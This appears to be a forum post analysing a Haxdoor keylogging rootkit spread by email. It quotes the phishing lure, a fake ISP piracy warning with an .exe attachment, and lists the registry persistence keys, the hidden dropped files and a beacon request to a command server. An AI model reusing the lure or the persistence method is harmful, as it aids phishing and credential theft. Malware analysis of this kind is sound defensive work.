A haxdoor rootkit is being distributed by email.

Your internet access is going to get suspended

The Internet Service Provider Consorcium was made to protect the rights of software authors, artists.
We conduct regular wiretapping on our networks, to monitor criminal acts.

We are aware of your illegal activities on the internet wich were originating from

You can check the report of your activities in the past 6 month that we have attached. We strongly advise you to stop your activities regarding the illegal downloading of copyrighted material of your internet access will be suspended.

Sincerely
ICS Monitoring Team
Attachment:
user-EA49943X-activities.zip
The zip file contains a file called user-EA49943X-activities.exe.
Haxdoor is able to capture all user keystrokes (including confidential details such username, password, credit card number, etc.) and then sends the stolen info to a remote attacker.

File details


Filename: user-EA49943X-activities.exe
Kaspersky: Trojan-Spy.Win32.Goldun.axt
Filename: cabpck.dll
Kaspersky: Trojan-Spy.Win32.Goldun.axn
Filename: krnlcab.sys
Kaspersky: Trojan-Spy.Win32.Goldun.axr

Notes


Registry changes.
  • Adds a key to the winlogon Notify packages to load the cabpck.dll. Haxdoor does hide the complete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify key
    QUOTE
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "a950"
    Type: REG_SZ
    Data: [343E1CC0963F65AD2]
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "Asynchronous"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "DllName"
    Type: REG_EXPAND_SZ
    Data: cabpck.dll
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "Impersonate"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "MaxWait"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cabpck "Startup"
    Type: REG_SZ
    Data: cabpck St
  • Adds a service called krnlcab.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "Class"
    Type: REG_SZ
    Data: LegacyDriver
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "ClassGUID"
    Type: REG_SZ
    Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "ConfigFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "DeviceDesc"
    Type: REG_SZ
    Data: Cabinet Kernel Packer
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "Legacy"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000 "Service"
    Type: REG_SZ
    Data: krnlcab
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000\Control
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000\Control "*NewlyCreated*"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KRNLCAB\0000\Control "ActiveService"
    Type: REG_SZ
    Data: krnlcab
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "DisplayName"
    Type: REG_SZ
    Data: Cabinet Kernel Packer
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "ErrorControl"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "ImagePath"
    Type: REG_EXPAND_SZ
    Data: system32\krnlcab.sys
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "Start"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab "Type"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Enum
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Enum "0"
    Type: REG_SZ
    Data: Root\LEGACY_KRNLCAB\0000
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Enum "Count"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Enum "NextInstance"
    Type: REG_DWORD
    Data: 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\krnlcab\Security
File system changes.
  • Creates a new folder.
    QUOTE
    %Temp%\msi_setup
  • Adds the following files. Only k86.bin is visible, the 2 others are hidden.
    QUOTE
    %system%\cabpck.dll
    Date: 9/13/2008 5:10 PM
    Size: 23,159 bytes
    %system%\k86.bin
    Date: 9/13/2008 5:11 PM
    Size: 0 bytes
    %system%\krnlcab.sys
    Date: 9/13/2008 5:10 PM
    Size: 8,672 bytes
Note: %Temp% is a variable that refers to the temporary folder. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

Winlogon.exe does listen for incoming connections and the following data was requested from social-bos.biz appending .NET CLR 1.1.2380 to my User Agent

CODE
GET /jerken/data.php?trackid=[removed] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.2380)
Host: social-bos.biz
~~~~~~~~~~: ~~~~~~~~~~